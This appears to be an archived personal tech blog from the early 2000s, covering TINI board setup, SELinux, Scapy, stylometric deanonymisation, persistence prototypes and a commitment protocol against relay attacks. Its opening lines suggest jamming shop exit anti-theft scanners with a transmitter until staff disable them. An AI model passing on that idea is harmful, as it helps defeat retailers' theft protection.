    Get a transmitter that triggers those resonance scanners that shops have at the exits (or just stick a tag on one, if you can). Wait for them to get so upset that they turn them off. (they are pretty much the only security in most shops). For bonus points get a transmitter powerful enough to trigger a whole shopping center.

    Snippets

    Something that I really should have known before:

    for x in `cat file`

    ... will tokenise file but

    cat file | while read x

    ... will do line-by-line processing, which is often what you actually want.
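
    The difference is the same as the one between splitting on any whitespace and splitting on line boundaries. A rough Python analogy (not an exact model of the shell, which also trims whitespace and handles backslashes in read):

```python
text = "first line\nsecond line with  spaces\n"

# Roughly what "for x in `cat file`" iterates over: whitespace-separated words.
tokens = text.split()

# Roughly what "cat file | while read x" iterates over: whole lines.
lines = text.splitlines()

if __name__ == "__main__":
    print(tokens)
    print(lines)
```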

    Systrace and SELinux

    I installed a system with systrace and SELinux, but I haven't had time to play about with them much yet. SELinux, from first looks, seems very complex - probably too complex for most uses. Systrace, however, is small and sweet. I've not looked at how it's implemented yet, but I suspect it might have quite a system call overhead. Will have to benchmark it.

    Saw Chicane live and he/they performed quite a lot of their new album which was very impressive. It was their old stuff which got the crowd going though. 16 18" drivers in a small venue hitting resonance is quite awe-ful*.

    * - that's awe-ful not awful - which is defined as meaning what awful used to mean.

    Coming up this week is O'Reilly's 25th anniversary (possibly just O'Reilly UK's 25 actually, now I come to think about it) and I get a free boat trip on Thursday to celebrate.

    The Hardened Gentoo proje...

    The Hardened Gentoo project has put a box on the net with a public root password. It's running SELinux and, even with root access, it should be secure. Go give it a try if you like.

    I'm building it at the moment to give it a play tomorrow.

    Everyone is tidying up li...

    Everyone is tidying up like mad around here because the Rector (head of the college) is visiting on Monday. We're showing off like never before (and have more funky, massive LCD screens than one can shake a stick at) so we're taking some pretty pictures to put on some SunRays (thin clients).

    Dave is a little shaky with the camera, but...

    and (if I keep it running over the weekend) pretty graphs!

    Been busy listening to, t...

    Been busy listening to, taking part in, filming for and going to the concert of.

    London feels like Los Ang...

    London feels like Los Angeles at the moment. Unfortunately it feels like the really hot inland areas of LA and not the constant-temperature-24-hours-a-day-with-sea-breeze bliss that is Santa Monica. The AirCon units in the dept are starting to fail.

    But I'm afraid, Ian&Janie, that it isn't going to last. This is England, which means it's really going to piss down soon.

    TINI Stuff

    Here's a writeup of my notes on setting up TINIs

    Setting Up TINIs

    Loading Firmware

    TINIs come with no firmware loaded and the first order of the day is to fix this. Even if your TINI has firmware loaded you may still wish to reload it as a method of extreme reset.

    Firstly, grab version 1.02e of the SDK. Version 1.02f came out between my experimenting with the TINIs and writing this, so if you have problems you may wish to try it.

    The SDK is written in Java and uses the Java Serial Port API to talk to the TINI. JDKs on Linux don't support this API so you either need to use a Windows box or (as I do) install RXTX. I'm using version 1.4 of RXTX. Follow the install instructions that come with RXTX (you need root for this). You also need to chgrp csg /var/lock (assuming you are going to run the SDK as a non-root member of group csg).

    Now make sure that the TINI is wired up correctly. You should be supplying 7.5V DC into the power socket. The TINI docs say 5V, but it seems that the voltage regulator needs quite a bit of power. The polarity doesn't seem to matter.

    You should also have a straight through serial cable running into the female serial port of the TINI (labelled J6). In the end, I got fed up with wondering if the cable was actually correct and plugged the TINI into the back of the computer.

    (from this point on, this information is in the TINI book)

    Now try firing up the firmware app:

    • cd tini1.02e/bin
    • java -classpath `pwd`/tini.jar -noverify JavaKit

    Select a comm port (if you don't see any, your RXTX install isn't correct) and click "Open Port". Now click "Reset". You should see the TINI talking to you. If you don't then try the other serial port and then look at the wiring carefully.

    From the File menu, load tini.tbin followed by slush.tbin from the tini1.02e/bin directory. This will take a little time over the serial cable.

    Now, in the SDK terminal window type these commands exactly, each followed by Enter:

    • BANK 18
    • FILL 0
    • EXIT

    The TINI should now boot. The default root password is tini

    TINI Networking

    Once you have a root console on the TINI you probably wish to delete the guest user with userdel. You can then set up networking with ipconfig -d (uses DHCP). Running ipconfig -C will then save the setup to Flash memory for when you reboot.

    TINI Programming

    General

    The TINIs have a small java virtual machine and can run java class files so long as they only use the supported subset of the libraries. TINIs only support Java 1.1 code and then, only if it has been specially premangled.

    Building .tini Files

    Firstly you need to build the class files for each .java file you have

    • javac -target 1.1 -classpath /tini1.02e/bin/tiniclasses.jar File.java

    Once all the .class files have been compiled, put them in a directory and run the premangler on them:

    • java -classpath /tini1.02e/bin/tini.jar TINIConvertor -f directory -d tini.db -o HelloWorld.tini

    See the 1-Wire chapter in the TINI book for details of the actual java. The driver for the temperature sensors had to be dug up using Google. It's called OneWireContainer10.java and I should have a copy if it's needed

    Ok, so it's been too long...

    Ok, so it's been too long since I updated this. This is the most interesting thing I've read in a while [via lambda]. For any Postgres admins out there, this script that I wrote is a better replacement for pg_dumpall (you'll need PyGreSQL).

    Incidentally, Python distutils bdist_rpm is very useful and cool.

    Local record store was holding a closing down sale and the Fellowship of the Ring soundtrack was one of the things I bought. I never realised that the choral work was done by Enya. It's a really good soundtrack.

    That's all I can think of for the moment.

    SysOps in Iraq

    I'll get round to describing my current project at some point. It's neat, but nothing very exciting. (It will have some useful Twisted Python snippets though.)

    In perhaps the most impressive display of War Against Drugs cluefulness so far the UK govt's latest drugs site is actually half correct. See their page on LSD - I wouldn't really disagree with any of that.

    Of course, it's not Erowid, but it's a big step in the right direction.

    Yesterday, O'Reilly sent ...

    Yesterday, O'Reilly sent me a note about their OpenBook project. More or less, they are reverting to "Founder's Copyright" where copyright only lasts 14 years (with an optional extension of another 14). After this time, O'Reilly release the book (on that website) under a Creative Commons license.

    The options to O'Reilly authors (i.e. myself) are 1) To agree 2) To decline 3) To take a 3 month option to find another publisher after 14 years, otherwise it goes free. (Guess which I chose).

    I'm really impressed that O'Reilly are doing this. Sure, computer books aren't going to be making much money after 14 years but even so, it's a damn good point of principle.

    How the heck, 3 weeks int...

    How the heck, 3 weeks into term, have I ended up with 2 odd socks? I always put a matching pair on in the morning and I'm pretty sure it stays that way during the day. It would be pretty tough to change one of my socks without me noticing. Perhaps if aliens were performing snap abductions just in order to do this (I can't think of any other way) but that would be frankly mind boggling.

    And it's not like there's a lot of places to hide a sock in my room. Sure, there's a fair amount of junk on the floor at any one time, but it gets turned over pretty often and if they were hiding in it I would be covered in random socks all the time; and I'm not. There's also always a fair amount of lint in the tumble dryer after a wash, I suppose. But I don't think that my socks (which survive so much during an average day) are getting atomised by a mere dryer.

    There's just no way that amotile inanimate objects could do this - which leads me to conclude that socks aren't in fact inanimate. Given the state of some people's shoes at the end of a day it wouldn't take too much for intelligent life to develop, I'm guessing. And, by definition, life tends to replicate so perhaps a number of everyone's socks are normal and the rest are living socks - able to run away at will (sorry about the pun) and so everyone is left with the odd, non-living socks.

    Just a couple of interres...

    Just a couple of interesting snippets from New Scientist that I picked up this morning:

    Firstly, there is a really terrible soap called Eastenders in the UK, possibly we export it too - I'm not sure. Anyway - like any soap it's completely over the top; at least it seems that way. New Scientist has figures averaged over the 18 year run time of Eastenders:

    Behaviour           Real Life (% of pop)               Eastenders (% of pop)
    Homicide            0.0016 %/year                      0.22 %/year
    Rape                0.3 %/year                         0.35 %/year
    Infidelity          women: 9 %/year, men: 14.6 %/year  women: 2 %/year, men: 1.7 %/year
    Men paying for sex  4.3 %/year                         0.18 %/year
    Deceived fathers    10 %/year                          5.8 %/year

    So, except for homicides, Eastenders is actually tamer than real life (consider that rape is vastly under reported in official statistics). That is a deeply depressing thought.

    On another topic, a couple of pages later

    The vasopressin receptor gene (...) is controlled by a promoter whose length varies between species. The expression of this gene in certain parts of the brain in rodents seems to be necessary for them to form monogamous pair bonds - to fall in love, as it were.

    (...) the prairie vole has a 460-base-pair insert in the gene's promoter which is lacking in its close relation, the montane vole. This has the effect of causing the gene to be expressed in a part of the prairie vole's brain where it is absent in the montane vole. It makes that part of the brain sensitive to vasopressin, a molecule released into the brain by the act of sex. (...) the male prairie vole becomes "socially addicted" to females it has had sex with, whereas the montane vole is socially indifferent to its mates. (... the first species is monogamous, the second polygamous ...) The human vasopressin receptor gene looks not unlike the prairie vole gene in both its promoter length and its expression pattern. But it varies in length between individuals. (...) the probability of divorce is highly heritable, and adopted people are more like their biological parents than their adoptive parents in this respect.

    TINI

    Well, all my exams are finally over (most of them went ok) so it's back to play time and today's plaything is a TINI

    It's a small (SIMM sized) Java processor that can drive a couple of serial ports, a 1-Wire net and Ethernet (10BaseT). Although the TINI itself is only SIMM sized, the connection board is a fair bit bigger; though still pretty tiny.

    The SDK contains a Java app that is supposed to load the firmware via the serial port and could I get it going? Could I bugger. I spent about 4-5 hours swapping serial cables/making serial cables/swapping computers. At one point I even had it plugged directly into the back of a computer just to eliminate cabling from the equation. After a while I decided that I couldn't possibly make it any worse and decided to play with the last option left - supply voltage. Now, the manual says it takes 5V +/- 5%, but (despite the LED being on at 5V) it only came to life at 7.5V. Aggh! Anyway - it's working now.

    It starts up a telnet and ftp server and you can upload preprocessed Java class files to it for execution. On the 1-Wire port I currently have a DS1820 temperature sensor (which says that it's 21C in Systems at the moment). Hopefully in future there will be a number of TINIs around the department with a number of DS1820s monitoring comms and machine rooms.

    If you like, you can reach it (for a while at least) at tincan.doc.ic.ac.uk.

    Nothing to see here for a...

    Nothing to see here for a while - I have maths exams all this week

    Due to a couple of oversi...

    Due to a couple of oversights (nothing to do with me, honest!) the whole Freenet website was lost today and SF can't/won't restore it from backup.

    So this evening has been a process of setting up CVS to sync to the live website on the fly and digging around in Google cache for all the snippets I can find of the website in order to patch it together again. Phew.

    With pot and porn outstripping...

    Zooko:Structure and Inter...

    Zooko:

    Structure and Interpretation of Computer Programs: Update: I'm stuck on exercise 1.13.

    Done:

    Proof of 1.13

    (or as a PDF)

    X-Men 2

    Deep as a puddle, but great fun. Go see.

    Jeff is also thinking abo...

    Jeff is also thinking about writing style recognition like I was a few days ago.

    It's nice to know that ev...

    It's nice to know that even wizards can have total brainfarts at times (from BUGTRAQ):

    The default behavior of the runtime linker on AIX is to search the current directory for dynamic libraries before searching system paths. This is done regardless of the executable's set[ug]id status.

    This story recounts one author's experiment with a Tip Jar system for funding a book. Now, this is good reading because there haven't been enough tests despite all the advocacy that these business models get from people like me. But the book itself is fantastic.

    Lethal Dose of Caffeine

    Erowid (the usual reference for all your interesting drugs) was giving a couple of different values for the LD50 of caffeine and I couldn't find a definitive value for it. Here's the reply from Erowid that I got:

    Thanks for your note. I went back to check where the 75mg/kg
    number came from and, unfortunately, the website reference I had for it no
    longer exists. Calculating estimated LD50s for
    humans is a tricky business I'd rather not get into, so I decided
    to simply change the number to the known LD50 in rats, which is
    192 mg/kg oral.
    
    I was able to find some numbers for lethal doses in humans (not
    LD50, but doses that actually killed the individual). A couple of
    those were IV rather than oral and were significantly lower than
    75 mg/kg (57 mg/kg in one case and 7 mg/kg in another). The
    estimate of 150 mg/kg in the caffeine faq is in the right ballpark
    for an oral human LD50.                                                
    
    Kernel 2.5.68

    As the kernel staggers towards 2.6 pre series I thought it might be worth trying it out.

    Short version: it doesn't boot yet

    Longer version: Booting gets as far as the AIC7xxx driver - which hangs. Removing that driver lets it get as far as the megaraid driver, which complains about all the error handling code that it's missing and then takes 3-4 minutes to scan all the LUNs. Then ALSA hangs. Removing ALSA reveals that the megaraid driver didn't manage to find my RAID array and so has nothing to mount as root.

    So it will be a little longer yet I'm guessing

    How to lose weight and ha...

    From this:

    Sam had to agree to handle the hardware abstraction layer (HAL) and not release the code he wrote for that component because Atheros uses a software defined radio (SDR). The company (and any individuals involved) could face huge headaches if they released code that allowed direct and simple manipulation of the SDR to work outside of a, b, or g ranges. He'll have precompiled binaries for many processors.

    So the company would be in trouble for selling a software defined radio? Is this another DMCA style piece of legal stupidity? I'm generally pretty hopeless with hardware (I leave it to the EE dept) but even I think I could build a radio! How does banning the sale of SDRs help anyone?

    Personally, I could have great fun with a good SDR. Roll on GNU Radio! (did I read somewhere that they announced a cheaper USB device at O'Reilly ETCon2?)

    Invisiblog

    Imperial shifted fileservers yesterday, which is why IV was giving access denied errors. In fact, due to the wonders of NFS, it may be down for a while longer as stale filehandles are removed.

    Invisiblog is a mixmaster based blogging system designed for totally anonymous blogging. This kind of stuff really appeals to me in a "yay freedom!" kind of way. If I had the hosting that could take the traffic and legal problems I would have done this sort of thing a while back - it's good that someone else has.

    But I would wonder exactly how anonymous they are. I have all the usual faith in Mixmaster and they seem like sensible people so I'm assuming no stupid screwups. But it's really hard to avoid slow intersection attacks.

    (Aside for people who don't know about intersection attacks: Assume I said "I was on the I10, going to work when the sun got in my eyes and I hit the central barrier, leaving a bright red mark on the barrier and a big dent in my door". From that we can say that the writer is a member of the intersection of a) the set of people who live in LA (high chance) b) the set of people who are driving east in the morning (the sun got in their eyes) c) the set of people who have a dent in their left door / paid a garage for repairs sometime soon after d) the set of people with red cars)
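
    As a toy illustration of that aside, each clue can be treated as a set of candidates and the sets intersected. The names and set memberships below are made up purely for the example, and narrow is a hypothetical helper:

```python
# Hypothetical candidate sets, one per clue in the quoted sentence.
la_residents = {"ann", "bob", "carol", "dave", "erin"}
drives_east = {"bob", "carol", "erin", "frank"}
dented_left_door = {"carol", "erin", "gina"}
red_car = {"bob", "erin", "gina"}


def narrow(clue_sets):
    """Intersect the clue sets in order, recording how many candidates remain."""
    remaining = None
    sizes = []
    for clue in clue_sets:
        remaining = set(clue) if remaining is None else remaining & clue
        sizes.append(len(remaining))
    return remaining, sizes


suspects, sizes = narrow([la_residents, drives_east, dented_left_door, red_car])
print(suspects, sizes)
```

    No single clue identifies anyone here, but the candidate count shrinks with every extra detail.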

    Even your style of writing can give a fair amount away. As a quick test I wrote a short Python script to find the mean and std dev of the numbers of 4 characters (';', ',', '-', '?') in each sentence and the length of each sentence.
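
    The original script isn't reproduced here, so the following is only a rough sketch of that kind of test. The sentence-splitting rule, the use of the population standard deviation, the rounding and the function names are all assumptions of this sketch:

```python
import math
import re

CHARS = (';', ',', '-', '?')


def mean_std(values):
    """Return (mean, population std dev) of a list of numbers, rounded to 3 places."""
    n = len(values)
    if n == 0:
        return (0.0, 0.0)
    mean = sum(values) / n
    variance = sum((v - mean) ** 2 for v in values) / n
    return (round(mean, 3), round(math.sqrt(variance), 3))


def style_profile(text):
    """One (mean, std dev) pair per character in CHARS, then one for sentence length."""
    # Assumption: a sentence ends at '.', '!' or '?' followed by whitespace.
    sentences = [s.strip() for s in re.split(r'(?<=[.!?])\s+', text) if s.strip()]
    stats = [mean_std([s.count(c) for s in sentences]) for c in CHARS]
    stats.append(mean_std([len(s) for s in sentences]))
    return stats


print(style_profile("Hi, there. Why; not?"))
```

    Each author's mail would be fed through style_profile separately and the resulting lists compared by eye.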

    Given some sample data. (Where would you go to find long, rambling prose? The Freenet mailing list archives of course! ) Here are the results for 3 people:

    Ian: [(0.0, 0.0), (1.173, 1.028), (0.464, 0.677), (0.042, 0.204), (110.536, 52.722)]
    Oskar: [(0.0, 0.0), (0.675, 0.812), (0.253, 0.464), (0.12, 0.328), (97.409, 60.337)]
    Matt: [(0.024, 0.153), (0.689, 0.905), (0.262, 0.642), (0.19, 0.395), (77.963, 59.192)]
    

    (I would have included Scott, but he doesn't say enough!)

    There are a fair number of differences even in this trivial test. If they use semi-colons - it's Matt. Lots of commas? Ian.

    So, given someone who seems to know a lot about Freenet I think I could narrow it down a fair amount using this very simple test by analysing the list archives. (assuming that they post to the list)

    The lesson is: be very careful

    Scapy

    Scapy[via LtU] is a domain specific language for manipulating network packets. Actually, it's a thin wrapper around a Python read-eval loop and all the better for it.

    Also, it makes for a very neat Python packet manipulation library. Have a look at the homepage (linked to above) for a transcript demonstrating some of its neat little features.

    % python scapy.py
    Welcome to Scapy (0.9.11.1beta)
    >>> net = Net ("127.0.0.0/24")
    >>> list = IP (src = net)
    >>> for x in list:
    ...  print repr (x)
    ...
    <snip>
    <IP src=127.0.0.246 |>
    <IP src=127.0.0.247 |>
    <IP src=127.0.0.248 |>
    <IP src=127.0.0.249 |>
    <snip>
    >>> Ether()/IP()/TCP()/"123"
    
    
      
      

    New signing only key

    Since I handle nearly all my email on DoC servers now I need a signing only key because I don't trust them with my main key. Outgoing mail from me should be signed by this key. This key is not secure, however. Anything for which you would generally require a signed message should still require a message signed with my main key. Although you can encrypt to this key, doing so would be stupid.

    -----BEGIN PGP PUBLIC KEY BLOCK-----
    Version: GnuPG v1.2.1 (GNU/Linux)
    
    mQGiBD6lQFIRBACpwWqCQF26SdILeV2TwrCygvkIxPKlp+qqZTMymyewEKVZ9+2L
    utXBHJxhSfJnQA12Oijmu6vx+7uCYdnR+yx/oW5Q1jhDymz+ASfsXJtAUFOERCQN
    n/JjeVJCM3EMLVnlMo1oDTioxfFClHDz0lRAZS5pAPZWpVJbrs24jgzeIwCgxJx8
    Tk7yPcI4bc0cIEvEbypi+wcD/12zXIFYir2eofG+4vxz+lMyHo5LXz8E4jSRWJTZ
    a7OOzz3PyT96mShPJ34pZLZuwbE4fK7Kvzr0rAo95E2pVXoe0r7croCOs51JXc/p
    LFiSexJvF8IN4bhehOy41SAM+86TNjQFZ9KISnWWBzpMXdQki8QpfhDP7BoiiJHk
    g3s0A/0Tddp5PV++ERzp7OyD+4IgqJyiGlqOo0Mm7q4BJ+tVul9pCtj+lRpDSJpf
    WLRSWKp3+8tLK1pQ0Ds0Cco37Ug8spbQzE7klxCpAMNzoYUfIDatWwTVkPSpPjgg
    LbG6OHuIjzJtddbcDISATWqoBevEn5Gd3XXy4bdKpW+pLzE2PYhhBB8RAgAhBQI+
    pUHJFwyAEZETJWrMD3GmTIRQh82lUt8stj1gAgcAAAoJEJj1NEYcnWNMSvkAnR8C
    fvFXTA5m5isr+6ruTrfK2PmoAJ9YwEMDByNh0MjgEcsF4DPSMRY037Q+QWRhbSBM
    YW5nbGV5IChOb24tc2VjdXJlIHNpZ25pbmcga2V5KSA8YWdsQGltcGVyaWFsdmlv
    bGV0Lm9yZz6IXwQTEQIAHwUCPqVAUgUJAeEzgAQLBwMCAxUCAwMWAgECHgECF4AA
    CgkQmPU0RhydY0z9WwCfb+SpaHAqDqhsZiNGrTK6rLojuh8Anj/U/LpHkUIs5HzZ
    QlUM89IKGHH7iEwEEBECAAwFAj6lQRoFgwHhMrgACgkQzaVS3yy2PWCciQCfaTsY
    hE3fUzoYrhWuzEsMihcJY4cAn0GCjb+yq/7pJ3/4+BNAEE/llU6wuM0EPqVAVBAD
    AJ/c6QLy7yfZQN/w1AwnD845/PhQh4kOw8tAqVCkfR3+qBSvhWwTYsqzEMujGExw
    SKlSwPyOgoRgzdVF7f4Jr9xRJbHZCF9RMMQiqabzgoXxHRU/0JxnJzf0WASxiTMN
    pwAECwL+OLVlgTpb0gT8iRUY3VwzAyL4gMlkf+5eLSteUGv9PsZhzvHeZBPPv4wE
    VQSEJczbpCJp3wOia9lkEm94HCVQ4whxi6lsoh5pGB0Fi/A50kliA22uMuvf4jwZ
    PKHn7K5oiEwEGBECAAwFAj6lQFQFCQHhM4AACgkQmPU0RhydY0wIoQCgqW1Y+ea/
    ASVDzgzRmRXxjMYJe+gAoMDScujnY2t4ZQgNuW0CvuXOQWvE
    =9hlG
    -----END PGP PUBLIC KEY BLOCK-----
    

    Persistence

    Over the past few weeks I've been knocking about with ideas (which generally go under the name of Landscape) for holding data between code. Generally a byte stream (be it a pipe or a file) is the highest we get when sharing data. Too much data is far too difficult to get to and too little data is well linked.

    One key part of fixing this could be a persistent object store and I've been messing with Python versions of this. Firstly, ZODB is far too slow and Prevayler keeps everything in memory.

    Prototype 1

    This kept data in XFS extended file attributes and each object was a file.

    Pros:

    • Nice kernel interface for non-Python code to use

    Cons:

    • Requires XFS
    • Inflexible

    Prototype 2/3

    This used SQL to store the objects.

    Pros:

    • Again, a nice interface for non-Python code
    • SQL has transaction ability
    • Backlinks are handled just by a different SQL query
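
    To make the backlinks point concrete, here is a minimal sketch using Python's sqlite3 module. The prototype's real schema and database aren't shown in this post, so the single links table, its column names and the two helper functions are assumptions for illustration only:

```python
import sqlite3

# Hypothetical schema: one row per named link from one object to another.
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE links (src TEXT, name TEXT, dst TEXT)")
db.executemany(
    "INSERT INTO links VALUES (?, ?, ?)",
    [
        ("syncthreading.pdf", "author", "Adam Langley"),
        ("syncthreading.pdf", "type", "PDF"),
        ("TR-94-06.pdf", "type", "PDF"),
    ],
)


def links_from(obj):
    """Forward links: everything that obj points at."""
    query = "SELECT name, dst FROM links WHERE src = ? ORDER BY name"
    return db.execute(query, (obj,)).fetchall()


def links_to(obj):
    """Backlinks: the same table, queried on the other column."""
    query = "SELECT src, name FROM links WHERE dst = ? ORDER BY src"
    return db.execute(query, (obj,)).fetchall()


print(links_from("syncthreading.pdf"))
print(links_to("PDF"))
```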

    Cons:

    • SQL is pretty slow - would have to read and write cache

    Prototype 4

    This uses proxy objects that act as far pointers and pickle/unpickle objects on demand.
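
    The prototype code isn't included here, so this is only a sketch of the general idea: a proxy that stands in for an object and unpickles it the first time it is touched. Store and FarPointer are hypothetical names, and an in-memory dictionary stands in for whatever held the pickles on disk:

```python
import pickle


class Store:
    """Hypothetical stand-in for the on-disk store: object id -> pickled bytes."""

    def __init__(self):
        self._blobs = {}

    def put(self, obj):
        oid = len(self._blobs)
        self._blobs[oid] = pickle.dumps(obj)
        return FarPointer(self, oid)

    def load(self, oid):
        return pickle.loads(self._blobs[oid])

    def save(self, oid, obj):
        self._blobs[oid] = pickle.dumps(obj)


class FarPointer:
    """Proxy that unpickles its target the first time it is used."""

    def __init__(self, store, oid):
        self._store = store
        self._oid = oid
        self._target = None
        self._loaded = False

    def _resolve(self):
        if not self._loaded:
            self._target = self._store.load(self._oid)
            self._loaded = True
        return self._target

    def __getattr__(self, name):
        # Only reached for names the proxy itself lacks. Private names are
        # refused so that a half-built proxy cannot recurse forever.
        if name.startswith("_"):
            raise AttributeError(name)
        return getattr(self._resolve(), name)

    def flush(self):
        """Write the target back to the store and drop the in-memory copy."""
        if self._loaded:
            self._store.save(self._oid, self._target)
            self._target = None
            self._loaded = False


store = Store()
doc = store.put({"title": "Sync Threading"})
print(doc.get("title"))  # the first attribute access triggers the unpickle
```

    This sketch sidesteps the garbage collector entirely by making flush explicit, which is exactly the part the real prototype was trying to automate.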

    Pros:

    • Deals with any pickleable Python object (e.g. most of them) well

    Cons:

    • Pain for anything non-Python to use
    • At the moment the code is a bit flaky. Playing with the garbage collector is a dangerous (and non-deterministic) game.

    Ramblings

    These are, of course, only prototypes to play about with these ideas. The true way to do it would be to use EROS. But EROS isn't seeing much take-up (I've not even got it to boot) and it might be better to put the neat bits of EROS into Linux, even if they don't all fit.

    Prototypes 1 and 2 only support dictionary type data and Prototype 3 has slightly bodged support for other objects (they can have a .type link, pointing to the Python code to be imported). Supporting other types of objects is very important for objects like (for example) the mixer, which has to get and set its values from/to somewhere else.

    The interface is also very important. Finding the right set of ideas to simply abstract data is a very hard problem. The interface to the same is possibly just as hard.

    At the moment the interface is shell like but different types of objects will need more than that. It remains to be seen if some objects will need to handle the interface themselves to the level that they do today (e.g. GTK/QT level APIs) or if a system akin to XHTML/CSS will do.

    Evil Bits

    When putting my email address on webpages I usually have it as aglREMOVETHIS@imperialviolet.org. Spammers have never bothered to try and decruft these addresses because there was always lower hanging fruit.

    Well, today I got email addressed to aglTHIS@imperialviolet.org. I guess the fruit isn't so low any more.

    A reply that the author of the `evil bit' RFC (3514) got. Note the company name at the bottom. (It was an April Fool's joke, for those who don't know.)

    What or who determines the "evilness" or "goodness" of the packet? If a security admin or OS can determine or flag bits as good, what keeps the hacker from spoofing this process by setting the bit to "good"? Does the bit change based on behavior? Or maybe a database with signatures of "bad" bits?

    (name deleted)

    Microsoft Corporation

    Nothing much to put up he...

    Nothing much to put up here. Been revising lots and still waiting for the CapPython PEP. Wondering about interfaces on landscape, but I doubt I'll do anything about that for a long time.

    The dog's sprained something and now has a leg in bandages.

    LuFS

    Ok, LuFS is pretty fantastic. Unlike all the other userfs implementations that I've come across it actually works, and it's fast. Using its localfs module (which just tests the LuFS interface by mirroring the existing filesystem) the speed difference is epsilon. Certainly for networked filesystems the LuFS latency is swamped by the network.

    Its FTP and SFTP modules really work quite well; I certainly expect to be using the SFTP one when I'm back at Imperial. It also supports autofs mounting so that you can just cd into (say) /mnt/sftp/agl@somehost and it will sftp (or ftp) mount it for you on the fly.

    And the localfs module could be a wonderful way to chroot some difficult programs by mapping on a configured set of directories read-only. Though it would need some of the grsecurity kernel patches for it to actually be secure.

    Capability Python

    Zooko's blog had been down for a fair time as he changed hosting, so I only noticed today that he had started posting again.

    Recently, he's been talking about adding capabilities to Python and, oddly enough, I was thinking about the exact same thing yesterday. If some of the introspection abilities of Python were limited, it would make a very effective capability language by using references as capabilities. Thankfully, from following some of the links on the python-dev archives (below) it seems that a PEP is being worked on.

    Once the language is limited, the standard library needs to be looked at. The Python people aren't going to accept the gutting of the library for the needs of capability freaks, so many of the modules will have to be proxied as they have dangerous functions (for example, taking a filename not a file handle).

    Also, some of the standard functions (thinking of __repr__ here) leak a little too much information and could be trimmed without loss of useful functionality. Leakage increases the bandwidth of side-channels. You can never be rid of side-channels, but you can stomp them as much as possible.

    Zooko has also written a nice crypto paper. However, I had to scribble notes when reading it and hope that this version is a little easier to understand:

    Defence Against Middleperson Attacks:

    Zooko, <zooko AT zooko DOT com>

    The Problem

    Alice thinks she's pretty hot stuff, chess wise, and bets that no one can beat her in a game. Bob takes her up on this challenge and the game commences. Unknown to Alice, Bob is also playing a game against a chess grand-master. Whenever Bob gets a move from Alice, he plays that move against the grand-master and relays his response to Alice. The grand-master trounces Bob, and so, Bob trounces Alice. Bob wins the bet.

    Somehow, Alice wishes to know that the identity of the person playing her matches a given public key. That way, if she encrypts the prize to that key she knows that Bob cannot cheat her - the surprised grand-master would get the goodies.

    The Solution

    Dramatis Personae

    • Alice's Move: m1
    • Bob's Move: m2
    • Alice's Public Key: PKA
    • Bob's Public Key: PKB
    • Random Nonces: n1 and n2
    • A Shared Integer: K

    Alice is ready to make the first move in the chess game. She calculates:

    • Message1 = (m1, PKA, n1)
    • Commitment1 = Hash(Message1)

    Alice transmits Commitment1 and sleeps K seconds. She then transmits a signed copy of Message1.

    After Bob receives Commitment1 he sleeps for K seconds. He then waits to receive the signed copy of Message1. Bob verifies that Message1 was signed by the included copy of PKA, and that Commitment1 is correct.

    Bob quickly ponders his move and calculates:

    • Message2 = (m2, PKB, PKA, Message1, n2)

    Bob signs Message2 and encrypts the signed copy with the PKA from Message1. He transmits this.

    Alice receives the signed and encrypted Message2. If more than K seconds have passed since she sent Message1 she aborts the game.

    Otherwise, she decrypts Message2 and checks the signature against the included PKB and that her public key is correct.
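
    The commitment and timing steps above can be sketched in a few lines of Python. This is a sketch only: signing and public-key encryption are left out, SHA-256 stands in for the unspecified Hash, and the length-prefixed encoding and all function names are assumptions rather than anything from the paper:

```python
import hashlib
import hmac
import secrets


def encode(*fields):
    """Length-prefix each field so that field boundaries are unambiguous."""
    return b"".join(len(f).to_bytes(4, "big") + f for f in fields)


def make_message1(move, public_key):
    """Message1 = (m1, PKA, n1), with a fresh random nonce n1."""
    nonce = secrets.token_bytes(16)
    return encode(move, public_key, nonce)


def commit(message):
    """Commitment1 = Hash(Message1)."""
    return hashlib.sha256(message).digest()


def commitment_matches(commitment, message):
    """Bob's check that the revealed Message1 matches the earlier commitment."""
    return hmac.compare_digest(commitment, commit(message))


def reply_in_time(sent_at, received_at, k):
    """Alice's check: abort if more than K seconds passed since she sent Message1."""
    return received_at - sent_at <= k


message1 = make_message1(b"e4", b"alice-public-key")
commitment1 = commit(message1)
print(commitment_matches(commitment1, message1))
```

    The nonce is what stops someone from guessing Message1 by hashing every plausible opening move against the commitment.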

    Results

    • The person who knows the private key which matches public key PKB is also the person who made chess move m2.

      Consider the plight of Bob, who tries to play Alice against a grand-master (who also follows this protocol). Bob must alter the public key in Message1 because the grand-master's reply is encrypted with it and Bob must substitute his key into the reply. Thus, Bob must wait for both Commitment1 and Message1 before he can forward either to the grand-master.

      However, he has to get the reply back to Alice within K seconds of her sending Message1, but the grand-master waits at least K seconds after receiving the altered Commitment1 from Bob.

    • The person who knows the private key which matches public key PKB signed Message2, so he knew the correct Alice public key and he knew Alice's original chess move.
    • Since Message2 was encrypted with Alice's real public key, it was not possible for anyone other than Alice to read the contents of Message2.

    Assumptions

    • K is great enough to ignore transmission times, and for Bob to consider his move
    • Everyone uses the same value for K
    • The public key cipher is secure and the hash is non-invertible.

    UserFS

    LuFS seems to be a userfs that is actually being worked on. I haven't tried it yet, but it could be promising.

    And it even has coderman's P2P fs as an experimental module

    Python Snippets That I Know I'll Be Hunting For In The Future

    Some notes on the stuff I was talking about yesterday. People are welcome to jump in with comments if they like, but this is mostly for me to recognise when I've gone in a circle.

    A terminal log from my knockup in Python. This uses setxattr and friends. It's a new toy in the kernel (go read the manpage) but only XFS supports it correctly. I think the terminal log pretty much speaks for itself

    List: 
    unsorted                 {e0cb6e07b63cd592cad592bbb2c4f37a}          
    title                    Root                                         
    keywords                 {904f3b6ed1f0bdc87cf11232eea4292b}          
    comp                     {f3d00322003197219ed873a87135f09c}          
    people                   {f2124f6ef95e9c0cb6899b32741ea969}          
    types                    {89b870c400af24726b0095896587a10f}          
    
    > ...unsorted 
    > List:       
    syncthreading.pdf        {Sync Threading}                             
    TR-94-06.pdf             {Control Transfer in Operating System Ker... 
    CIRCA_whitepaper.pdf     {CIRCA Technology Overview}                  
    core_vulnerabilities.pdf {Advanced Buffer Overflows}                  
    RC22534Rev1full.pdf      {Thirty Years Later: Lessons from the Mul... 
    
    > ...syncthreading.pdf 
    > List:                
    title                    Sync Threading                               
    type                     {PDF}                                        
    filename                 syncthreading.pdf                            
    author                   {Adam Langley}                               
    
    > ...author 
    > List:     
    email                    agl@imperialviolet.org                       
    title                    Adam Langley                                 
    
    > Pop   
    > List: 
    title                    Sync Threading                               
    type                     {PDF}                                        
